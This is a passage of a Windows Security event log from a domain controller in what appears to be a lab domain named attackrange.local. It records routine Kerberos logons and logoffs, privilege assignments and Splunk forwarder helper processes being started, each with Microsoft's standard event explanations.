Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264605
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83B65D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:23:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264604
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83B65D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53498
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:23:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264603
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83B65D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264619
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BB50
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264618
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BC3F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264617
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BC87
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264616
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83C204
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53507
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264615
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83C204
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264614
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1498
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264613
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83BC87
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53504
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264612
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BC87
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264611
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83BC3F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264610
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BC3F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264609
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83BB50
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53503
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264608
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BB50
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264607
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83BB2E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53502
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264606
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BB2E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264621
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264620
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1930
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264622
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ba8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264624
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264623
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264625
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264626
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83C204
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264627
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x833212
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264630
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83F5D8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
